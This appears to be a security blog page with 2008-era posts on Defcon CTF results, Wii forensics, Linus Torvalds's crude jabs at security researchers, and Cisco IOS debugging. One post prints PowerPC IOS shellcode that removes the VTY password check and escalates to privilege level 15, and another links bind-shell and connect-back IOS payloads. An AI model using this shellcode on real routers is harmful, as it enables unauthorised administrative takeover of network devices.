September 1st, 2014

Defcon 2008 CTF Update

1@stPlace has posted an update to their 2008 Defcon CTF page that includes all of the binaries from CTF (20-some different binaries in all) as well as the Shakespeare Challenge I mentioned in the last post. Time to break out the debuggers, :).

PS. Thanks to Doc Brown for pointing this out for me. :)

Wii Forensics

Here’s a random white-paper of the day for you. It’s a paper on the Forensic Investigation of the Nintendo Wii. I was both interested and amused to find some real forensics work on that has been done on the Wii. Compared to the XBox and the PS3, it doesn’t look like there is a whole lot of easily attainable forensics evidence on a Wii. According to the paper this is mostly due to the lack of an internal hard-drive, on-board memory, and a proprietary OS/File-system.

He talks about the built-in system logging (play statistics that are held in the mail system), internet browsing & shopping, Mail and wireless components and briefly touches on mod-chips as well. He gives a process for performing the analysis and walks through each step. One random non-tech thing that he mentions is a case where a man catches his wife cheating on him by finding and examining a Mii character on his Wii.

I found the article on the website for the Small Scale Digital Device Forensic Journal (SSDDFJ). It looks like they have a few different papers on forensics for consumer-electronic type devices.

New Tools From Defcon

Here’s a list of the new tools released at defcon this year. 21 different tools in all, and it looks like some interesting stuff. The CD that was distributed to Defcon attendees has also been published.

Via hack-a-day

Linus Torvalds vs. Security

OK — I wasn’t going to post anything about this thread until I saw this quote from Linus Torvalds:

I think the OpenBSD crowd is a bunch of masturbating monkeys, in
that they make such a big deal about concentrating on security to the
point where they pretty much admit that nothing else matters to them.

It’s already been heavily covered elsewhere, but Linus Torvalds has made some interesting and humorous comments about the security community, and for some reason also calls out openBSD directly. Outside of these comments, I usually consider Mr. Torvalds a generally pragmatic fellow. He now seems to distance himself from either the full- or non- disclosure ideals. Here’s his quote on the topic:

“Both camps are whoring themselves out for their own reasons, and both camps point fingers at each other as a way to cement their own reason for existence,”

I do agree some some of his statements, but I definitely wouldn’t consider security bugs and “normal” bugs the same because of the additional exposure a security vulnerability allows for.

Defcon 2008 CTF Write-up

1@stPlace recently posted a write-up on the Defcon CTF competition. There’s not too much detail on the specific contests that were run, but it’s good to get some insight into the competition. Also of note is a blog post from atlas, the team captain for 1@stPlace, talking a bit more about the competition.


I’ve heard a bit of speculation about how skewl of root was able to dominate the competition so thoroughly. Here’s an interesting quote from atlas on the topic:

This year, Sk3wl multiplied both the evi1 as well as the technical awe of our attack from last year, instead, denying any of our teams the ability to score. How they did this, I can’t say specifically, but let’s just say they pwned the services themselves and made their own version of a “service-r00tkit”, modifying information to either prevent us from gaining shell on the box or changing the contents of keys so we received bogus keys and our overwrites were dorked as well.

Something else I found pretty interesting was a blurb from atlas on a pretty interesting sounding challenge:

Kenshoto provided a text file with all of shakespeare’s works. our job was to find the longest run of bytes which convert to x86 opcodes which don’t touch memory.

If anyone else knows about other posts, or has other information on either the CTF or openCTF challenges at Defcon, I’d love to hear about them.

The scoreboard @ CTF:

More IOS shellcode

It looks like more shellcode has been released for IOS at BlackHat this year. Looks interesting.

Following our Cisco IOS shell code presentation at Blackhat Vegas 2008,
IRM has decided to release three variants of the IOS shell codes
discussed in the presentation. Following are the payloads that can be
used as both code execution based payloads and runtime memory resident
backdoors within IOS:-

* Password protected bind shell -

http://www.irmplc.com/downloads/presentations/IOS_Bindshell_v.1.0.txt

* Connect Back Shell -

http://www.irmplc.com/downloads/presentations/IOS_Connectback_v.1.0.txt

* Two byte overwrite bind shell -

http://www.irmplc.com/downloads/presentations/IOS_tiny_v.1.0.txt

Step by Step Debugging Cisco IOS

This is kinda cool — I didn’t know that you could do this directly with GDB. Andy Davis has posted step by step instructions for debugging Cisco IOS with GDB. He’s done some other pretty interesting things lately including posting a remote exploit of IOS, and as a follow-up to the exploit he posted information on how his IOS shellcode works.

Other than a minor gdb patch, and a couple idiosyncrasies with the debugging process (you have to manually replace the instructions overwritten by breakpoint interrupts), from his instructions it looks like it’s pretty straightforward to do. I’m not sure of the details on how it’s able to attach to the kernel, but I’d like to try it out sometime. I wonder if some of this info will spur other security people to do more IOS research.

Andy’s IOS shellcode:

.equ vty_info, 0x8182da60 //contains a pointer to the VTY info structure
.equ terminate, 0x80e4086c

lis 4,vty_infoha
la 4,vty_infol(4)
xor 8,8,8 //Clear r8
lwzx 7,4,8 //Get pointer to VTY info structure
stw 8,372(7) //Write zero to first offset to remove
                         //the requirement to enter a password
subi 8,8,1 //Set r8 to be 0xffffffff
addi 7,7,233 //Add second offset in two steps to
                         //avoid nulls in the shellcode
stw 8,1226(7) //Write 0xffffffff to second offset to
                         //priv escalate to level 15
                         //(technically this should be 0xff100000
                         //but 0xffffffff works and is more efficient)
mr 3,8 //Use 0xffffffff as a parameter
                         //to pass to terminate()
lis 4,terminateha
la 4,terminatel(4)
mtctr 4
bctr //terminate "this process" 

Last Hope Videos Posted

For others like me who weren’t able to attend The Last Hope this year in NYC, (most of) the videos have been posted as torrents. I’m pretty psyched about this since I’ve heard a lot of good things about the talks there. I haven’t been to a HOPE since HOPE2k, but I really enjoyed it then, and it seemed to have a different flavor of talks and crowd compared to the usual cons. I see a few interesting looking talks on some things like biohacking, botnets, the debian openssl bug, virtualization, and the PLA among other things. I also heard that some tools were released for the “cold boot” memory grabbing, disk encryption key snarfing hack that was all the rage a few months back.

Anyone have suggestions for their favorite talks of HOPE?

Imhotep theme designed by Chris Lin. Proudly powered by Wordpress.
XHTML | CSS | RSS | Comments RSS